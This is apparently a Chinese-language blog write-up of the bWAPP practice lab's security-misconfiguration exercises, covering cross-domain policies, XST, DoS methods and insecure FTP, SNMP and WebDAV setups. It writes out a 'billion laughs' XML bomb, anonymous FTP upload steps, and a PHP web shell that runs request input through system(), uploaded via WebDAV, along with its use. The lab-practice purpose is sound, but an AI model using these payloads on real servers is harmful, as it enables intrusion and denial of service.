bwapp–security-misconfiguration系列

正文:

1.Arbitrary File Access (Samba)

有一个samba的任意文件读写漏洞,暂时还不知道怎样利用。

一.cross

2.Cross-Domain Policy File (Flash)

https://blog.csdn.net/novelly/article/details/17739755
不正确的crossdomain.xml策略将导致严重的安全问题,如信息泄露、CSRF等
看一下代码:

$file = "../crossdomain.xml";
if($_COOKIE["security_level"] == "1" or $_COOKIE["security_level"] == "2")
{
    $data = "\n";
    $data.= "\n";
    $data.= "\n";
    $data.= "  \n";
    $data.= "";
}
else
{
    $data = "\n";
    $data.= "\n";
    $data.= "\n";
    $data.= "  \n";
    $data.= "";
}

low级别没有对域做出限制。
flash Silverlight设置错误出现的问题。

3.跨域资源共享 CORS(Cross-origin resource sharing)

http://www.ruanyifeng.com/blog/2016/04/cors.html
其他域名的Cookie并不会上传,且(跨源)原网页代码中的document.cookie也无法读取服务器域名下的Cookie。

4.Cross-Site Tracing (XST)

https://blog.csdn.net/yu422560654/article/details/7801030
XST攻击属于XSS攻击的一种:
XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及htlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击
XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方;
3、目标站点存在跨域漏洞。
可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证

二.dos

5.Denial-of-Service (Large Chunk Size)

是一个nginx的漏洞dos攻击。平台内有脚本下载。
试了下,把我登陆直接下了。

6.Denial-of-Service (Slow HTTP DoS)

参考链接
利用的HTTP POST:POST的时候,指定一个非常大的
content-length,然后以很低的速度发包,比如10-100s发一个字节,hold住这个连接不断开。这样当客户端连接多了后,占用住了webserver的所有可用连接,从而导致DOS。
解决方案:
对web服务器的http头部传输的最大许可时间进行限制,修改成最大许可时间为20秒。
利用:slowhttptest  工具

7.Denial-of-Service (SSL-Exhaustion)

https://www.exploit-db.com/exploits/41278/
http://www.codeweblog.com/ssl-dos%E6%94%BB%E5%87%BB%E5%B7%A5%E5%85%B7-thc-ssl-dos/ 内有工具
利用:SSL-DoS攻击工具–thc-ssl-dos

8.Denial-of-Service (XML Bomb)

xxe那篇博客是有一个dos的攻击利用的。


 <!ELEMENT login (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
&lol9;blah

试了下,靶机就崩了(是本地访问崩了,其他ip访问没有问题),害的我重新起了主机。

三.Insecure Configuration

9.Insecure FTP Configuration

我直接是用ftp匿名上去。虽然有所限制,只能在本目录下,看了下,运气很好是网站目录,即我们可以上传cmd.php等文件,测试成功。
Anonymous access granted, restrictions apply
命令:ftp,open ip,mkdir dd,cd dd,put cmd.php

10.Insecure SNMP Configuration

用处不大,现在服务器上都会配置只允许哪些IP访问本机的SNMP服务
snmpenum 工具:https://github.com/ajohnston9/snmpenum/blob/master/README.txt
snmpwalk工具:snmpwalk -v 2c -c public ip

11.Insecure WebDAV Configuration(着实长知识了)

1)put webdav/cmd.php
post:

<?php
if(isset($_REQUEST['cmd']))
{
echo "<pre>";
$cmd=($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>

2)http://192.168.244.170/webdav/cmd.php?cmd=ls

四.本地提权,平台内有脚本

12.Local Privilege Escalation (sendpage)
13.Local Privilege Escalation (udev)

五.中间人攻击

中间人攻击的可怕之处:
1).中间人在所有的数据包中过滤Cookie关键字,获取服务器授予已登录用户的临时Cookie ID,以绕过服务器对此用户的密码认证;
2).中间人过滤有关下载路径的信息,篡改此数据包,将此路径指向预先准备好的病毒程序的互联网地址,以达到传播病毒程序体的目的;
3).截获已知认证协议的账户、密码;
4).使用sslstrip模型,绕过https的防御以截获账户、密码信息;
5).屏蔽或者重定向指定的网络地址;

14.Man-in-the-Middle Attack (HTTP)
15.Man-in-the-Middle Attack (SMTP)

利用:局域网内arpspoof(kali自带),cain等;由于之前用过一次,不再演示。

六.others

16.Old, Backup & Unreferenced Files

backd00r.php
c0nfig.inc
p0rtal.bak
p0rtal.zip
web.c0nfig
web.c0nfig.bak
wp-c0nfig.bak

17.robots.txt

 
2018.7.31

发表评论

电子邮件地址不会被公开。 必填项已用*标注